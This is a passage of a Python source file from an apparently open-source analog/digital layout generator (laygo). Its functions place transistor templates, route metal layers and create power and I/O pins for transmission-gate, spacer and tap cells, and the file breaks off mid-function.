74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
9
2016-12-28T03:08:29.000Z
2019-01-30T16:00:28.000Z
laygo/generators/logic/logic_templates_layout_generator.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
10
2018-07-14T01:31:28.000Z
2021-08-21T10:18:30.000Z
#!/usr/bin/python ######################################################################################################################## # # Copyright (c) 2014, Regents of the University of California # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the # following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following # disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the # following disclaimer in the documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ######################################################################################################################## """Logic layout """ import laygo import numpy as np import yaml import os #import logging;logging.basicConfig(level=logging.DEBUG) def create_io_pin(laygen, layer, gridname, pinname_list, rect_list, offset_y=np.array([-1, 1])): """create digital io pin""" rect_xy_list = [laygen.get_xy(obj =r, gridname=gridname, sort=True) for r in rect_list] #align pins ry = rect_xy_list[0][:, 1] + offset_y.T for i, xy_rect in enumerate(rect_xy_list): xy_rect[:, 1]=ry laygen.pin(name=pinname_list[i], layer=layer, xy=xy_rect, gridname=gridname) def create_power_pin(laygen, layer, gridname, rect_vdd, rect_vss, pinname_vdd='VDD', pinname_vss='VSS'): """create power pin""" rvdd_pin_xy = laygen.get_xy(obj = rect_vdd, gridname = gridname) rvss_pin_xy = laygen.get_xy(obj = rect_vss, gridname = gridname) laygen.pin(name=pinname_vdd, layer=layer, xy=rvdd_pin_xy, gridname=gridname) laygen.pin(name=pinname_vss, layer=layer, xy=rvss_pin_xy, gridname=gridname) def generate_tgate_dn(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in_space = laygen.place("I"+objectname_pfix+'NDMY', devname_nmos_space, pg, shape=np.array([2, 1]), xy=origin) in0 = laygen.relplace(name = "I" + objectname_pfix + 'N0', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_space.name) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix+'N3', templatename = devname_nmos_body, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix+'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name) ip_space = laygen.relplace(name = "I"+objectname_pfix+'PDMY', templatename = devname_pmos_space, gridname = pg, refinstname = in_space.name, direction='top', transform='MX', shape=np.array([2, 1])) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_space.name, transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip2.name, shape=np.array([3,1]), transform='MX') # route #to vss laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in3.name, refpinname1='S0', refinstindex1=np.array([0, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([0, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S1', refinstindex0=np.array([0, 0]), refinstname1=in3.name, refpinname1='S1', refinstindex1=np.array([0, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([1, 0])) # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-3, 0]), xy1=np.array([-3, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-3, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-2, 0]), xy1=np.array([-2, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([-2, 0]), refinstname=ip1.name, refpinname='G0', gridname=rg_m2m3) in3_g0_xy = laygen.get_inst_pin_xy(in3.name, 'G0', rg_m2m3) ip1_g0_xy = laygen.get_inst_pin_xy(ip1.name, 'G0', rg_m2m3) laygen.route_vh(layerv=laygen.layers['metal'][3], layerh=laygen.layers['metal'][2], xy0=in3_g0_xy[0], xy1=ip1_g0_xy[0], gridname0=rg_m2m3) laygen.via(None, xy=in3_g0_xy[0], gridname=rg_m2m3) in3_g0_xy = laygen.get_inst_pin_xy(in3.name, 'G0', rg_m1m2) laygen.via(None, xy=in3_g0_xy[0], gridname=rg_m1m2) #input laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0])) #output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #add for in3 laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([m-1, 0]), refinstname1=in3.name, refpinname1='D0', refinstindex1=np.array([0, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) #add for in3 laygen.via(None, np.array([0, 1]), refinstname=in3.name, refpinname='D0', refinstindex=np.array([0, 0]), gridname=rg_m1m2) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) # power and groud rail xy = laygen.get_xy(obj = ip3.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip_space.name, refinstname1=ip3.name, refinstindex1=np.array([2, 0])) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in_space.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'ENB', 'I', 'O'], rect_list=[ren0, renb0, ri0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_space_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'pmos4_fast_space', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_space_2x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_2x', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'pmos4_fast_space_2x', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_space_4x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf4', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'pmos4_fast_space_nf4', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_space_wovdd_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'nmos4_fast_space', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_space_wovdd_2x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_2x', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'nmos4_fast_space_2x', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_space_wovdd_4x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf4', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'nmos4_fast_space_nf4', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_float(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name, via0=[0,0]) # power and groud rail xy = laygen.get_template_xy(name = in0.cellname, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VDD0", gridname = rg_m1m2) rvss_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VSS0", gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_float_pmos_vss(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][2], xy0=xy_tap1, xy1=xy_tap1-np.array([2,0]), gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name, via0=np.array([0,0]), via1=np.array([0,0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0])-np.array([2,0]), xy1=xy_tap1-np.array([2,0]), gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]) - np.array([2,0]), refinstname=in0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_template_xy(name = in0.cellname, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VDD0", gridname = rg_m1m2) rvss_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VSS0", gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_pmos_vss(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0])+[0,1], xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=in0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0])+[0,1], xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=in0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_template_xy(name = in0.cellname, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VDD0", gridname = rg_m1m2) rvss_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VSS0", gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_wovdd(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, origin=np.array([0, 0]), create_pin=False): pg = 